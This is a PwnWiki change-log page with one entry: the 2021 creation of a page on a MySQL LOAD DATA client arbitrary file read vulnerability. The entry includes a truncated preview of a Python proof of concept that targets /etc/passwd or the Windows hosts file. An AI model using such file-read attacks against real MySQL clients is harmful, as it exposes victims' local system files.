All public logs
From PwnWiki
Combined display of all available logs of PwnWiki. You can narrow down the view by selecting a log type, the username (case-sensitive), or the affected page (also case-sensitive).
- 15:20, 10 July 2021 Pwnwiki talk contribs created page Mysql LOAD DATA 客戶端任意文件讀取漏洞 (Created page with "==POC1== <pre> #!/usr/bin/python #coding: utf8 import socket # linux : #filestring = "/etc/passwd" # windows: #filestring = "C:\Windows\system32\drivers\etc\hosts" HOST = "0....")